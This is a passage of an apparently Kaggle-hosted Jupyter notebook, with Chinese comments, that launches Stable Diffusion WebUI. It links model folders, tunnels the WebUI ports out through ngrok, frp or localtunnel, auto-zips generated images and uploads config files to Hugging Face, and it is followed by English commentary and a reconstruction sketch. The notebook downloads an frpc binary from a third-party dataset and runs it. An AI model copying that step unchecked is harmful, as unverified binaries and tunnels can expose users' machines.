filename in os.listdir(source_path):\n source_file_path = os.path.join(source_path, filename)\n target_file_path = os.path.join(target_dir, filename)\n if not os.path.exists(target_file_path):\n os.symlink(source_file_path, target_file_path)\n print(f'Created symlink for {filename} in {target_dir}')\n else:\n filename = os.path.basename(source_path)\n target_file_path = 
os.path.join(target_dir, filename)\n if not os.path.exists(target_file_path):\n os.symlink(source_path, target_file_path)\n print(f'Created symlink for {filename} in {target_dir}')\n print('链接成功')\n \n# 链接模型文件\ndef link_models():\n cn_model.append('/kaggle/models/cn-model')\n vae_model.append('/kaggle/models/VAE')\n sd_model.append('/kaggle/models/Stable-diffusion')\n lora_model.append('/kaggle/models/Lora')\n hypernetworks_model.append('/kaggle/models/hypernetworks')\n ESRGAN.append('/kaggle/models/ESRGAN')\n lyco_model.append('/kaggle/models/lyco')\n animatediff_model.append('/kaggle/models/animatediffmodel')\n animatediff_lora.append('/kaggle/models/animatedifflora')\n create_symlinks(vae_model,f'{install_path}/stable-diffusion-webui/models/VAE')\n create_symlinks(sd_model,f'{install_path}/stable-diffusion-webui/models/Stable-diffusion')\n create_symlinks(lora_model,f'{install_path}/stable-diffusion-webui/models/Lora')\n create_symlinks(cn_model,f'{install_path}/stable-diffusion-webui/extensions/sd-webui-controlnet/models')\n create_symlinks(embeddings_model,f'{install_path}/stable-diffusion-webui/embeddings')\n create_symlinks(hypernetworks_model,f'{install_path}/stable-diffusion-webui/models/hypernetworks')\n create_symlinks(ESRGAN,f'{install_path}/stable-diffusion-webui/models/ESRGAN')\n create_symlinks(tags,f'{install_path}/stable-diffusion-webui/extensions/a1111-sd-webui-tagcomplete/tags')\n create_symlinks(scripts,f'{install_path}/stable-diffusion-webui/scripts')\n create_symlinks(lyco_model,f'{install_path}/stable-diffusion-webui/models/lyco')\n create_symlinks(animatediff_model,f'{install_path}/stable-diffusion-webui/extensions/sd-webui-animatediff/model')\n create_symlinks(animatediff_lora,f'{install_path}/stable-diffusion-webui/models/Lora')\n","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"# 功能函数:内网穿透\n#ngrok\ndef ngrok_start(ngrokTokenFile: str, port: int, address_name: str, should_run: bool):\n if not should_run:\n print('Skipping ngrok start')\n return\n if Path(ngrokTokenFile).exists():\n with open(ngrokTokenFile, encoding=\"utf-8\") as nkfile:\n ngrokToken = nkfile.readline()\n print('use nrgok')\n from pyngrok import conf, ngrok\n conf.get_default().auth_token = ngrokToken\n conf.get_default().monitor_thread = False\n ssh_tunnels = ngrok.get_tunnels(conf.get_default())\n if len(ssh_tunnels) == 0:\n ssh_tunnel = ngrok.connect(port, bind_tls=True)\n print(f'{address_name}:' + ssh_tunnel.public_url)\n else:\n print(f'{address_name}:' + ssh_tunnels[0].public_url)\n else:\n print('skip start ngrok')\n\n#Frp内网穿透 \nimport subprocess\n\ndef install_Frpc(port, frpconfigfile, use_frpc):\n if use_frpc:\n subprocess.run(['chmod', '+x', '/kaggle/working/frpc/frpc'], check=True)\n print(f'正在启动frp ,端口{port}')\n subprocess.Popen(['/kaggle/working/frpc/frpc', '-c', frpconfigfile])\n","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\">自动压缩保存图片</span>","metadata":{"editable":false}},{"cell_type":"code","source":"import os\nimport time\nimport zipfile\nimport random\ndirectory = f'{install_path}/stable-diffusion-webui/outputs'\noutput_directory = '/kaggle/working/历史生成/'\noutput_path = '/kaggle/working/archive.zip' \nclass ImageCompressor:\n def __init__(self, directory, output_path, save_time):\n self.directory = directory\n self.output_path = 
output_path\n self.save_time = save_time\n def _compress_single_image(self, zipf, filepath):\n zipf.write(filepath, os.path.relpath(filepath, self.directory))\n def compress_directory(self):\n while True:\n with zipfile.ZipFile(self.output_path, 'w', zipfile.ZIP_DEFLATED) as zipf:\n for root, _, files in os.walk(self.directory):\n for file in files:\n if file.endswith(('.jpg', '.jpeg', '.png', '.tmp')):\n filepath = os.path.join(root, file)\n self._compress_single_image(zipf, filepath)\n print(f\"每隔{self.save_time}秒保存一次图片到archive.zip\")\n time.sleep(self.save_time)\n def run(self):\n while True:\n time.sleep(0.5)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex(('127.0.0.1', 7860))\n if result == 0:\n break\n sock.close()\n self.compress_directory()\ndef compress_images(directory, output_directory):\n !mkdir /kaggle/working/历史生成/\n initial_files = set()\n for root, _, files in os.walk(directory):\n for file in files:\n if file.endswith(('.jpg', '.jpeg', '.png', '.tmp')):\n filepath = os.path.join(root, file)\n initial_files.add(filepath)\n counter = 1 \n while True:\n time.sleep(0.1)\n current_files = set()\n for root, _, files in os.walk(directory):\n for file in files:\n if file.endswith(('.jpg', '.jpeg', '.png', '.tmp')):\n filepath = os.path.join(root, file)\n current_files.add(filepath)\n new_files = current_files - initial_files\n if new_files:\n temperatures = get_gpu_temperature()\n for i, temp in enumerate(temperatures):\n print(f\"当前GPU Nvidia Tesla T4 {i+1} 温度: {temp}°C(温度越高,生成速度会稍微下降0.2%)\")\n #output_filename = str(counter).zfill(8) + '.zip' \n #output_path = os.path.join(output_directory, output_filename)\n #zipf = zipfile.ZipFile(output_path, 'w', zipfile.ZIP_DEFLATED)\n #for file in new_files:\n # zipf.write(file, os.path.relpath(file, directory))\n #zipf.close() # 递增计数器\n #initial_files = current_files\n #counter += 1\ndef extract_all_zips(directory):\n for root, _, files in os.walk(directory):\n for file in files:\n if file.endswith('.zip'):\n filepath = os.path.join(root, file)\n with zipfile.ZipFile(filepath, 'r') as zip_ref:\n zip_ref.extractall(root)\n os.remove(filepath)","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\">SD-webui启动函数</span>","metadata":{"editable":false}},{"cell_type":"code","source":"def iframe_thread_1(port):\n while True:\n time.sleep(0.5)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex(('127.0.0.1', port))\n if result == 0:\n break\n sock.close()\n p = subprocess.Popen([\"lt\", \"--port\", \"{}\".format(port)], stdout=subprocess.PIPE)\n for line in p.stdout:\n print(line.decode(), end='')\n result = subprocess.run(['curl', 'ipv4.icanhazip.com'], capture_output=True, text=True)\n print('部署WebUI成功!你的公网IP地址是', result.stdout.strip())\n print('如果该链接卡顿,可换Ngrok内网穿透')\n print('记得给作者打赏哦')\n \ndef start_webui_1():\n if use2:\n install_Frpc('7861',frpconfigfile1,use_frpc1)\n #ngrok_start(ngrokTokenFile1,7861,'第二个webui',ngrok_use1)\n !sleep 90\n #threading.Thread(target=iframe_thread_1, daemon=True, args=(7861,)).start()\n %cd $install_path/stable-diffusion-webui\n args1.append(f'--ckpt=models/Stable-diffusion/{usedCkpt1}')\n if os.path.exists(Venvpath):\n !/kaggle/opt/conda/envs/venv/bin/python3 launch.py {' '.join(args1)} --port 7861 --device-id=1\n else:\n !sleep 12\n print(\"\\033[92m 您选择不使用第二张显卡运行,函数start_webui_1跳过 \\033[0m\")\n 
pass\n\ndef start_webui_0():\n print('\\033[92m 正在以第一张显卡启动SD-webui \\033[0m')\n if environment == 2:\n !/kaggle/opt/conda/envs/venv/bin/python3 -m pip install xformers==0.0.23\n if use_frpc:\n !aria2c --console-log-level=error -c -x 16 -s 16 -k 1M https://huggingface.co/datasets/ACCA225/Frp/resolve/main/frpc -d /kaggle/working/frpc -o frpc\n #threading.Thread(target=iframe_thread, daemon=True, args=(7860,)).start()\n %cd $install_path\n install_Frpc('7860',frpconfigfile,use_frpc)\n #ngrok_start(ngrokTokenFile,7860,'第一个webui',ngrok_use)\n %cd $install_path/stable-diffusion-webui\n !mkdir models/lyco\n args.append(f'--ckpt=models/Stable-diffusion/{usedCkpt}')\n if os.path.exists(Venvpath):\n if os.path.exists(\"/kaggle/opt/conda/envs/venv/bin/python3\"):\n !/kaggle/opt/conda/envs/venv/bin/python3 launch.py {' '.join(args)}\n else:\n print(\"由于你自身迷惑操作导致发生未知错误,正在重试\")\n fix_attempt()\n !/kaggle/opt/conda/envs/venv/bin/python3 launch.py\n else:\n !/opt/conda/envs/venv/bin/python3 launch.py {' '.join(args)} \n\ndef iframe_thread(port):\n while True:\n time.sleep(0.5)\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex(('127.0.0.1', port))\n if result == 0:\n break\n sock.close()\n p = subprocess.Popen([\"lt\", \"--port\", \"{}\".format(port)], stdout=subprocess.PIPE)\n for line in p.stdout:\n print(line.decode(), end='')\n result = subprocess.run(['curl', 'ipv4.icanhazip.com'], capture_output=True, text=True)\n print('部署WebUI成功!你的公网IP地址是', result.stdout.strip())\n print('请从对应7860或者7861端口的内网穿透链接进入SD')\n \ndef nv():\n !/kaggle/opt/conda/envs/venv/bin/python3 -m \"pip\" install nvidia-ml-py3 > /dev/null 2>&1\ndef start_webui():\n if use2:\n print('正在以双卡模式启动WebUI')\n else:\n print('正在以单卡模式启动WebUI,如需使用双卡跑图,请将use2设置为True')\n \n with ProcessPoolExecutor() as executor:\n futures = []\n for func in [nv, start_webui_0, start_webui_1]:\n futures.append(executor.submit(func))\n time.sleep(1)\n for future in futures:\n future.result()\n \ndef prepare():\n if localtunnel: \n !apt-get update & npm install -g localtunnel\n else:\n os.system('apt-get update')\n os.system('apt -y install -qq aria2 > /dev/null 2>&1')","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"import multiprocessing\n# 将会同步的文件\nyun_files = [\n'ui-config.json',\n'config.json',\n'styles.csv'\n]\ndef warn():\n print(\"正在启动SD脚本,由于kaggle服务器没有对外暴露7860端口,请记得先配置内网穿透再进入SD!!\")\n print(\"正在启动SD脚本,由于kaggle服务器没有对外暴露7860端口,请记得先配置内网穿透再进入SD!!\")\n print(\"\\033[92m正在启动SD脚本,由于kaggle服务器没有对外暴露7860端口,请记得先配置内网穿透再进入SD!!重要的事情说三遍\\033[0m\")\ndef main():\n startTicks = time.time()\n #ngrokdetect()\n def func1():\n warn()\n def func2():\n prepare()\n process1 = multiprocessing.Process(target=func1)\n process2 = multiprocessing.Process(target=func2)\n process1.start()\n process2.start()\n with ProcessPoolExecutor() as executor:\n futures = []\n for func in [install_webui, venv_install]:\n futures.append(executor.submit(func))\n time.sleep(0.5)\n try:\n for future in futures:\n future.result()\n except Exception as e:\n print(\"运行出错了。\")\n except CancelledError:\n print(\"运行被用户中止\")\n #libtcmalloc()\n downloadsize()\n ticks = time.time()\n print(\"加载耗时:\", (ticks - startTicks), \"s\")\n if '--share' in args:\n print('您正在使用Gradio内网穿透,这可能会导致会话被强制终止')\n try:\n start_webui()\n except Exception as e:\n 
print(f\"由于你自身的迷惑操作导致发生未知错误,错误信息:{e}\")","metadata":{"ExecutionIndicator":{"show":false},"tags":[],"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"-------------","metadata":{"editable":false}},{"cell_type":"markdown","source":"# > <span style=\"color:green; font-weight:;\">打包图片上传到HuggingFace (可选)</span>","metadata":{"editable":false}},{"cell_type":"code","source":"#功能函数,清理打包上传\nfrom pathlib import Path\nfrom huggingface_hub import HfApi, login\n\ndef zip_venv():\n !pip install conda-pack\n !rm -rf /kaggle/working/venv.tar.gz\n !conda pack -n venv -o /kaggle/working/venv.tar.gz --compress-level 0\n\ndef hugface_upload(huggingface_token_file, yun_files, repo_id):\n if Path(huggingface_token_file).exists():\n with open(huggingface_token_file, encoding=\"utf-8\") as nkfile:\n hugToken = nkfile.readline()\n if hugToken != '':\n # 使用您的 Hugging Face 访问令牌登录\n login(token=hugToken)\n # 实例化 HfApi 类\n api = HfApi()\n print(\"HfApi 类已实例化\")\n %cd $install_path/stable-diffusion-webui\n # 使用 upload_file() 函数上传文件\n print(\"开始上传文件...\")\n for yun_file in yun_files:\n if Path(yun_file).exists():\n response = api.upload_file(\n path_or_fileobj=yun_file,\n path_in_repo=yun_file,\n repo_id=repo_id,\n repo_type=\"dataset\"\n )\n print(\"文件上传完成\")\n print(f\"响应: {response}\")\n else:\n print(f'Error: File {yun_file} does not exist')\n else:\n print(f'Error: File {huggingface_token_file} does not exist')\n\ndef clean_folder(folder_path):\n if not os.path.exists(folder_path):\n return\n for filename in os.listdir(folder_path):\n file_path = os.path.join(folder_path, filename)\n if os.path.isfile(file_path):\n os.remove(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n\ndef zip_clear_updata():\n if zip_output:\n output_folder = '/kaggle/working/'\n if os.path.exists(output_folder):\n shutil.make_archive('/kaggle/working/图片', 'zip', output_folder)\n print('图片已压缩到output')\n else:\n print(f'文件夹 {output_folder} 不存在,跳过压缩操作')\n if clear_output:\n %cd /kaggle/outputs/\n clean_folder('img2img-images')\n clean_folder('txt2img-images')\n clean_folder('img2img-grids')\n clean_folder('txt2img-grids')\n clean_folder('extras-images')\n print('清理完毕')\n if huggingface_use == True:\n hugface_upload(huggingface_token_file,yun_files,huggiingface_repo_id)\n if use_zip_venv == True:\n zip_venv()\n \ntry:\n code()\nexcept Exception as e:\n print('运行失败,请检查Internet是否开启')\nwith open('/kaggle/temp/Token.txt', 'r') as file:\n file_contents = file.read()","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"markdown","source":"# > <span style=\"color:red; font-weight:;\">执行区域,输出结果在此处看,从内网穿透链接进入Stable Diffusion绘画界面</span>","metadata":{"editable":false}},{"cell_type":"markdown","source":"# > <span style=\"color:red; font-weight:;\">如果报错了,请反馈给群主</span>","metadata":{"editable":false}},{"cell_type":"code","source":"import concurrent.futures\n'''\n执行函数\n'''\nif __name__ == \"__main__\":\n compressor = ImageCompressor(directory=directory, output_path=output_path, save_time=200) #save_time为图片自动保存间隔,默认60秒压缩保存一次图片\n executor = concurrent.futures.ThreadPoolExecutor(max_workers=4)\n future1 = executor.submit(main)\n future2 = executor.submit(compressor.run)\n concurrent.futures.wait([future1, future2])\n 
executor.shutdown()","metadata":{"_kg_hide-input":true,"_kg_hide-output":false,"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"#测试用\n!cp -r /kaggle/opt/conda/envs/venv /kaggle/working\n\n!/kaggle/opt/conda/envs/venv/bin/python3 -m \"pip\" install insightface\n\n%cd /kaggle/working/opt/conda/envs\n\n!find . ! -name 'venv_2024.2.18.tar.bak' -exec rm -rf {} +\n\n%cd /kaggle/working\n\n!tar -cvf /kaggle/working/venv_2024.2.18.tar.bak ./venv","metadata":{"trusted":true,"editable":false},"outputs":[],"execution_count":null},{"cell_type":"code","source":"'''\n -h, --help 显示此帮助消息并退出\n --update-all-extensions\n launch.py 参数:在启动程序时下载所有扩展的更新\n --skip-python-version-check\n launch.py 参数:不检查Python版本\n --skip-torch-cuda-test\n launch.py 参数:不检查CUDA是否能正常工作\n --reinstall-xformers launch.py 参数:安装适当版本的xformers,即使您已经安装了某个版本\n --reinstall-torch launch.py 参数:安装适当版本的torch,即使您已经安装了某个版本\n --update-check launch.py 参数:在启动时检查更新\n --test-server launch.py 参数:配置用于测试的服务器\n --skip-prepare-environment\n launch.py 参数:跳过所有环境准备步骤\n --skip-install launch.py 参数:跳过软件包的安装\n --data-dir DATA_DIR 存储所有用户数据的基本路径\n --config CONFIG 构建模型的配置文件路径\n --ckpt CKPT 稳定扩散模型的检查点路径;如果指定了此参数,该检查点将添加到检查点列表并加载\n --ckpt-dir CKPT_DIR 包含稳定扩散检查点的目录路径\n --vae-dir VAE_DIR 包含VAE文件的目录路径\n --gfpgan-dir GFPGAN_DIR\n GFPGAN目录\n --gfpgan-model GFPGAN_MODEL\n GFPGAN模型文件名\n --no-half 不将模型切换为16位浮点数\n --no-half-vae 不将VAE模型切换为16位浮点数\n --no-progressbar-hiding\n 不在gradio UI中隐藏进度条(因为它会减慢浏览器中的硬件加速)\n --max-batch-count MAX_BATCH_COUNT\n UI的最大批次计数值\n --embeddings-dir EMBEDDINGS_DIR\n 文本反演的嵌入目录(默认为embeddings)\n --textual-inversion-templates-dir TEXTUAL_INVERSION_TEMPLATES_DIR\n 包含文本反演模板的目录路径\n --hypernetwork-dir HYPERNETWORK_DIR\n 超网络目录\n --localizations-dir LOCALIZATIONS_DIR\n 本地化目录\n --allow-code 允许从Web界面执行自定义脚本\n --medvram 启用稳定扩散模型的优化,以牺牲一些速度以实现低VRM使用率\n --lowvram 启用稳定扩散模型的优化,以牺牲大量速度以实现非常低的VRM使用率\n --lowram 将稳定扩散检查点权重加载到VRAM而不是RAM中\n --always-batch-cond-uncond\n 禁用条件/非条件批处理,该批处理可通过--medvram或--lowvram来节省内存\n --unload-gfpgan 无任何操作。\n --precision {full,autocast}\n 在此精度下进行评估\n --upcast-sampling 上升采样。对于--no-half没有影响。通常与--no-half相比,产生类似的结果,性能更好,同时使用更少的内存。\n --share 对gradio使用share=True,并使UI可以通过其网站访问\n --ngrok NGROK ngrok的认证令牌,替代gradio --share\n --ngrok-region NGROK_REGION\n 无任何操作。\n --ngrok-options NGROK_OPTIONS\n 以JSON格式传递给ngrok的选项,例如:\n '{\"authtoken_from_env\":true,\n \"basic_auth\":\"user:password\",\n \"oauth_provider\":\"google\",\n \"oauth_allow_emails\":\"[email protected]\"}'\n --enable-insecure-extension-access\n 禁用其他选项,启用扩展选项\n --codeformer-models-path CODEFORMER_MODELS_PATH\n 包含codeformer模型文件的目录路径。\n --gfpgan-models-path GFPGAN_MODELS_PATH\n 包含GFPGAN模型文件的目录路径。\n --esrgan-models-path ESRGAN_MODELS_PATH\n 包含ESRGAN模型文件的目录路径。\n --bsrgan-models-path BSRGAN_MODELS_PATH\n 包含BSRGAN模型文件的目录路径。\n --realesrgan-models-path REALESRGAN_MODELS_PATH\n 包含RealESRGAN模型文件的目录路径。\n --clip-models-path CLIP_MODELS_PATH\n 包含CLIP模型文件的目录路径。\n --xformers 启用xformers的交叉注意力层\n --force-enable-xformers\n 启用xformers的交叉注意力层,无论检查代码是否认为您可以运行它;如果此操作无法正常工作,请不要提交错误报告\n --xformers-flash-attention\n 启用具有Flash Attention的xformers,以提高可重现性(仅适用于SD2.x或变体)\n --deepdanbooru 无任何操作。\n --opt-split-attention\n 首选Doggettx的交叉注意力层优化,用于自动选择优化方式\n --opt-sub-quad-attention\n 首选内存高效的次二次交叉���意力层优化,用于自动选择优化方式\n --sub-quad-q-chunk-size SUB_QUAD_Q_CHUNK_SIZE\n 用于次二次交叉注意力层优化的查询块大小\n --sub-quad-kv-chunk-size SUB_QUAD_KV_CHUNK_SIZE\n 用于次二次交叉注意力层优化的kv块大小\n --sub-quad-chunk-threshold SUB_QUAD_CHUNK_THRESHOLD\n 用于次二次交叉注意力层优化的VRAM阈值的百分比,以使用块处理\n --opt-split-attention-invokeai\n 
首选InvokeAI的交叉注意力层优化,用于自动选择优化方式\n --opt-split-attention-v1\n 首选旧版本的分割注意力优化,用于自动选择优化方式\n --opt-sdp-attention 首选缩放点积交叉注意力层优化,用于自动选择优化方式;需要PyTorch 2.*\n --opt-sdp-no-mem-attention\n 首选没有内存高效注意力的缩放点积交叉注意力层优化,用于自动选择优化方式,使图像生成具有确定性;需要PyTorch 2.*\n --disable-opt-split-attention\n 首选不进行交叉注意力层优化,用于自动选择优化方式\n --disable-nan-check 不检查生成的图像/潜空间是否包含NaN;在没有检查点的情况下运行时很有用\n --use-cpu USE_CPU [USE_CPU ...]\n 使用CPU作为指定模块的torch设备\n --listen 使用0.0.0.0作为服务器名称启动gradio,以响应网络请求\n --port PORT 使用给定的服务器端口启动gradio,对于<1024的端口,您需要root/admin权限,默认为7860(如果可用)\n --show-negative-prompt\n 无任何操作。\n --ui-config-file UI_CONFIG_FILE\n 用于ui配置的文件名\n --hide-ui-dir-config 隐藏Web界面中的目录配置\n --freeze-settings 禁用编辑设置\n --ui-settings-file UI_SETTINGS_FILE\n 用于ui设置的文件名\n --gradio-debug 使用--debug选项启动gradio\n --gradio-auth GRADIO_AUTH\n 设置gradio的身份验证,格式为“username:password”;或者使用逗号分隔多个,例如“u1:p1,u2:p2,u3:p3”\n --gradio-auth-path GRADIO_AUTH_PATH\n 设置gradio的身份验证文件路径,例如“/path/to/auth/file”,与--gradio-auth具有相同的身份验证格式\n --gradio-img2img-tool GRADIO_IMG2IMG_TOOL\n 无任何操作。\n --gradio-inpaint-tool GRADIO_INPAINT_TOOL\n 无任何操作。\n --gradio-allowed-path GRADIO_ALLOWED_PATH\n 将路径添加到gradio的allowed_paths,使其可以从中提供文件\n --opt-channelslast 将稳定扩散的内存类型更改为channels last\n --styles-file STYLES_FILE\n 用于样式的文件名\n --autolaunch 启动后在系统的默认浏览器中打开Web界面的URL\n --theme THEME 使用浅色或深色主题启动UI\n --use-textbox-seed 在UI中使用文本框作为种子(没有上/下箭头,但可以输入长种子)\n --disable-console-progressbars\n 不将进度条输出到控制台\n --enable-console-prompts\n 使用txt2img和img2img生成时,在控制台打印提示\n --vae-path VAE_PATH 用作VAE的检查点;设置此参数会禁用与VAE相关的所有设置\n --disable-safe-unpickle\n 禁用检查PyTorch模型是否包含恶意代码\n --api 使用api=True同时启动API和Web界面(仅使用--nowebui启动API)\n --api-auth API_AUTH 设置API的身份验证,格式为“username:password”;或者使用逗号分隔多个,例如“u1:p1,u2:p2,u3:p3”\n --api-log 使用api-log=True启用所有API请求的日志记录\n --nowebui 使用api=True启动API而不是Web界面\n --ui-debug-mode 不加载模型,快速启动UI\n --device-id DEVICE_ID\n 选择要使用的默认CUDA设备(在之前需要导出CUDA_VISIBLE_DEVICES=0,1等)\n --administrator 管理员权限\n --cors-allow-origins CORS_ALLOW_ORIGINS\n 以逗号分隔的列表形式的允许CORS源(无空格)\n --cors-allow-origins-regex CORS_ALLOW_ORIGINS_REGEX\n 单个正则表达式形式的允许CORS源\n --tls-keyfile TLS_KEYFILE\n 部分启用TLS,需要--tls-certfile才能完全工作\n --tls-certfile TLS_CERTFILE\n 部分启用TLS,需要--tls-keyfile才能完全工作\n --disable-tls-verify 通过此参数启用使用自签名证书。\n --server-name SERVER_NAME\n 设置服务器的主机名\n --gradio-queue 无任何操作。\n --no-gradio-queue 禁用gradio队列;导致网页使用HTTP请求而不是Websockets;在早期版本中是默认设置\n --skip-version-check 不检查torch和xformers的版本\n --no-hashing 禁用检查点的sha256哈希,以提高加载性能\n --no-download-sd-model\n 即使在--ckpt-dir中找不到模型,也不下载SD1.5模型\n --subpath SUBPATH 自定义gradio的子路径,与反向代理一起使用\n --add-stop-route 添加/_stop路由以停止服务器\n '''","metadata":{"jupyter":{"source_hidden":true},"trusted":true,"editable":false},"outputs":[],"execution_count":null}]}
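For readers of the deleted notebook above: its first cell writes two frpc INI files and launches `frpc` against them in background threads, so the WebUI ports on the Kaggle machine become reachable through a remote frp server. The sketch below restates that pattern in a minimal form; the server address, token, ports, and file paths are placeholders rather than values taken from the commit, and it assumes an `frpc` binary is already present in the working directory.

```python
# Minimal sketch of the notebook's frpc bootstrap cell (placeholder values).
import subprocess
import threading

SERVER_ADDR = "frp.example.com"   # placeholder frp server address
TOKEN = "your-frp-token"          # placeholder token

def write_frpc_config(path: str, local_port: int, remote_port: int) -> None:
    # Render an INI config mapping a local WebUI port to a remote frp port.
    config = f"""
[common]
server_addr = {SERVER_ADDR}
server_port = 7000
token = {TOKEN}

[sdwebui_{remote_port}]
type = tcp
local_ip = 127.0.0.1
local_port = {local_port}
remote_port = {remote_port}
"""
    with open(path, "w") as f:
        f.write(config)

def start_frpc(binary: str, config_path: str, log_path: str) -> None:
    # frpc keeps running in the background; its output goes to a log file,
    # mirroring what the notebook does with subprocess.Popen.
    with open(log_path, "w") as log:
        subprocess.Popen([binary, "-c", config_path], stdout=log, stderr=log)

if __name__ == "__main__":
    write_frpc_config("./frpc_7860.ini", local_port=7860, remote_port=10016)
    t = threading.Thread(target=start_frpc,
                         args=("./frpc", "./frpc_7860.ini", "./frpc_7860.log"))
    t.start()
    t.join()
```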
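The notebook's `download_link` helper also encodes an informal convention for its model URL lists: an entry may carry a file-name prefix separated from the URL by a colon (for example `rei.safetensors:https://...`) that decides the saved name, while plain Hugging Face links fall back to the URL's basename and other links keep the server-provided name. A hedged sketch of that parsing, assuming `aria2c` is installed (the notebook installs it with apt):

```python
# Sketch of the "filename:URL" download convention used in the deleted notebook.
import re

def build_aria2c_command(link: str, target_folder: str) -> str:
    filename = None
    # "name.ext:https://..." -> split off the explicit file name
    m = re.match(r"^([^:]+):((?:https?|ftps?)://.+)$", link)
    if m:
        filename, url = m.group(1).strip(), m.group(2)
    else:
        url = link
        # Hugging Face URLs have a stable basename, so pin it explicitly.
        if url.startswith("https://huggingface.co/"):
            filename = url.rsplit("/", 1)[-1]
    cmd = (f'aria2c --console-log-level=error -c -x 16 -s 16 -k 1M '
           f'-d "{target_folder}"')
    if filename:
        cmd += f' -o "{filename}"'
    else:
        cmd += " --remote-time"  # keep the server's name and timestamp
    return cmd + f' "{url}"'

# Example: named Lora download from the notebook's lora_model_urls list.
print(build_aria2c_command(
    "rei.safetensors:https://huggingface.co/yongiant/lance/resolve/main/reiXL_AutC_lokr_V43P1.safetensors",
    "Lora"))
```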